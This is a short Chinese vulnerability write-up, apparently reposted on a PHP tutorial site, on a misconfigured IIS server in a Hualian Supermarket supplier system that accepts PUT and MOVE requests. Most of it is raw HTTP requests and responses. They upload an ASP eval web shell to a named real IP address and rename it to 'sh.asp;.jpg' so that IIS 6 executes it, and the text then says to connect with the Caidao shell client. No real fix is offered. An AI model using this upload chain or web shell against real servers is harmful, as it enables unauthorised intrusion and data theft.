网站地图    收藏   

主页 > 后端 > 网站安全 >

华联超市某站危险方法导致任意文件上传,已she

来源:自学PHP网    时间:2015-04-17 10:15 作者: 阅读:

[导读] 华联超市股份有限公司是中国国内第一家上市的连锁超市公司,其前身为成立于1993年1月的上海华联超市公司。本漏洞出现在华联超市供应商系统中,导致供应商信息泄露。详细说明:由...

华联超市股份有限公司是中国国内第一家上市的连锁超市公司,其前身为成立于1993年1月的上海华联超市公司。
漏洞出现在华联超市供应商系统中,导致供应商信息泄露。
详细说明:
由于IIS配置不当,开放put、move方法,导致文件上传,并且可move为jpg文件,利用IIS解析漏洞可执行上传文件。
 
在测试过程中出现了个小插曲,只能put txt文件,不能move为asp文件,后来发现可以move为jpg文件。
 
目标地址:218.204.14.84
 
请求:
 
PUT /te.txt HTTP/1.1
 
Host: 218.204.14.84
 
Content-Length: 30
 
 
 
<%eval request("testtest")%>
 
返回:
 
HTTP/1.1 201 Created
 
Date: Tue, 25 Jun 2013 14:01:47 GMT
 
Server: Microsoft-IIS/6.0
 
X-Powered-By: ASP.NET
 
Location: http://218.204.14.84/te.txt
 
Content-Length: 0
 
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK
 
请求:
 
MOVE /te.txt HTTP/1.1
 
Host: 218.204.14.84
 
Destination: http://218.204.14.84/sh.asp;.jpg
 
返回:
 
HTTP/1.1 201 Created
 
Date: Tue, 25 Jun 2013 13:59:03 GMT
 
Server: Microsoft-IIS/6.0
 
X-Powered-By: ASP.NET
 
Location: http://218.204.14.84/sh.asp;.jpg
 
Content-Type: text/xml
 
Content-Length: 0
 
上传上去后直接上菜刀
 
 
修复方案:
好多漏洞,都不知道咋补

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论